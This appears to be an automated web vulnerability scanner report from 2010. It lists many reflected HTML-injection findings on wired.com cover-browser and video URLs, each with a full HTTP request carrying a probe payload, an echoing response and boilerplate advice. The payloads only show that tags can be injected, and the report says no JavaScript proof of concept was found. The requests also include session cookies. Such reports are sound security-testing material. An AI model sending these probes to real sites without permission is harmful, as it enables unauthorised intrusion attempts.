GET /video/wired-magazine7d785"><a>b9ac96fbebb HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=282 Expires: Mon, 22 Nov 2010 00:57:12 GMT Date: Mon, 22 Nov 2010 00:52:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106684
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_wired-magazine7d785"><a>b9ac96fbebb"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b64e"><a>0440a54481 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser2b64e"><a>0440a54481/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29351 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:11:09 GMT Date: Mon, 22 Nov 2010 01:07:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser2b64e"><a>0440a54481"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload effcc"><a>54cc432a143 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowsereffcc"><a>54cc432a143/1993 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=221 Expires: Mon, 22 Nov 2010 01:12:12 GMT Date: Mon, 22 Nov 2010 01:08:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowsereffcc"><a>54cc432a143 c_1993"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dee65"><a>afd4fe05db5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/1993dee65"><a>afd4fe05db5 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=218 Expires: Mon, 22 Nov 2010 01:12:28 GMT Date: Mon, 22 Nov 2010 01:08:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_1993dee65"><a>afd4fe05db5"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd84f"><a>055ac53fcac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowsercd84f"><a>055ac53fcac/1994 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:12:34 GMT Date: Mon, 22 Nov 2010 01:08:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowsercd84f"><a>055ac53fcac c_1994"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b287"><a>f4a04b9cc0f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/19945b287"><a>f4a04b9cc0f HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=221 Expires: Mon, 22 Nov 2010 01:12:39 GMT Date: Mon, 22 Nov 2010 01:08:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_19945b287"><a>f4a04b9cc0f"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 243b4"><a>a6be1769b46 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser243b4"><a>a6be1769b46/1995 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=236 Expires: Mon, 22 Nov 2010 01:12:27 GMT Date: Mon, 22 Nov 2010 01:08:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser243b4"><a>a6be1769b46 c_1995"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c7e4"><a>35b2608d8b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/19952c7e4"><a>35b2608d8b HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29362 Vary: Accept-Encoding Cache-Control: max-age=218 Expires: Mon, 22 Nov 2010 01:12:28 GMT Date: Mon, 22 Nov 2010 01:08:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_19952c7e4"><a>35b2608d8b"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2face"><a>4498e865eb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser2face"><a>4498e865eb/1996 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29362 Vary: Accept-Encoding Cache-Control: max-age=234 Expires: Mon, 22 Nov 2010 01:11:57 GMT Date: Mon, 22 Nov 2010 01:08:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser2face"><a>4498e865eb c_1996"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e82c0"><a>d25d8be8dce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/1996e82c0"><a>d25d8be8dce HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=225 Expires: Mon, 22 Nov 2010 01:12:09 GMT Date: Mon, 22 Nov 2010 01:08:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_1996e82c0"><a>d25d8be8dce"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70a17"><a>f51bea8abc9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser70a17"><a>f51bea8abc9/1997 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=227 Expires: Mon, 22 Nov 2010 01:11:38 GMT Date: Mon, 22 Nov 2010 01:07:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser70a17"><a>f51bea8abc9 c_1997"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed9bb"><a>55ff099ec8c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/1997ed9bb"><a>55ff099ec8c HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:12:15 GMT Date: Mon, 22 Nov 2010 01:08:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_1997ed9bb"><a>55ff099ec8c"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc6db"><a>7a1cb95c9c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowserfc6db"><a>7a1cb95c9c8/1998 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:11:37 GMT Date: Mon, 22 Nov 2010 01:07:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowserfc6db"><a>7a1cb95c9c8 c_1998"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e0ca"><a>d40bc3e4695 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/19984e0ca"><a>d40bc3e4695 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:12:08 GMT Date: Mon, 22 Nov 2010 01:08:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_19984e0ca"><a>d40bc3e4695"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3335a"><a>6fb29d915a6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser3335a"><a>6fb29d915a6/1999 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=219 Expires: Mon, 22 Nov 2010 01:11:15 GMT Date: Mon, 22 Nov 2010 01:07:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser3335a"><a>6fb29d915a6 c_1999"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ff2c"><a>a871307756c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/19995ff2c"><a>a871307756c HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=225 Expires: Mon, 22 Nov 2010 01:11:54 GMT Date: Mon, 22 Nov 2010 01:08:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_19995ff2c"><a>a871307756c"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd3c2"><a>0a5f2735ed6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowsercd3c2"><a>0a5f2735ed6/2000 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:11:27 GMT Date: Mon, 22 Nov 2010 01:07:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowsercd3c2"><a>0a5f2735ed6 c_2000"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65112"><a>9f2ff113a98 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/200065112"><a>9f2ff113a98 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=219 Expires: Mon, 22 Nov 2010 01:11:44 GMT Date: Mon, 22 Nov 2010 01:08:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_200065112"><a>9f2ff113a98"> ...[SNIP]...
